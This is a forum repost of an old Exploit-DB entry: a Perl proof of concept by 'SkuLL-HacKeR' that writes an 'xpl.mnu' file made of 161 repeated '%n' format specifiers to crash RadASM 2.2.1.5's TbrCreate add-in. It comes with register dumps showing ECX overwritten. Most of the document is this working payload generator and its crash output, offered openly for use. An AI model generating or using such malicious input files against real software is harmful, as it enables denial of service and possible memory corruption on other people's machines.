Exploit RadASM 2.2.1.5 - '.mnu' Local Format String (PoC)

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
9345
Проверка EDB
  1. Пройдено
Автор
SKULL-HACKER
Тип уязвимости
DOS
Платформа
WINDOWS
CVE
null
Дата публикации
2009-08-03
Код:
# RadASM 2.2.1.5 (.mnu File) Format string Poc
# By SkuLL-HacKeR
# GreetZ : hack4love - Aser ro7 - ThE g0bL!N - Qabandi
# EAX 00002E2E
# ECX 41413D92 ECX overwrited
# EDX 00000002
# EBX 00000000
# ESP 0013F894
# EBP 0013F9AC ASCII "..................................................................."
# ESI 00187658 ASCII "%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n"
# EDI 0013FFFE
# EIP 0040171A TbrCreat.0040171A
# directory app
# C:\Documents and Settings\Administrateur\Bureau\aRadASM\AddIns\TbrCreate.exe
# i think is hard to exploit maybe anyone can exploit it :d
my $unicode="%n" x 161;
my $file="xpl.mnu";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $unicode ;
close($FILE);
print "$file has been created \n";

# milw0rm.com [2009-08-03]
 
Источник
www.exploit-db.com

Похожие темы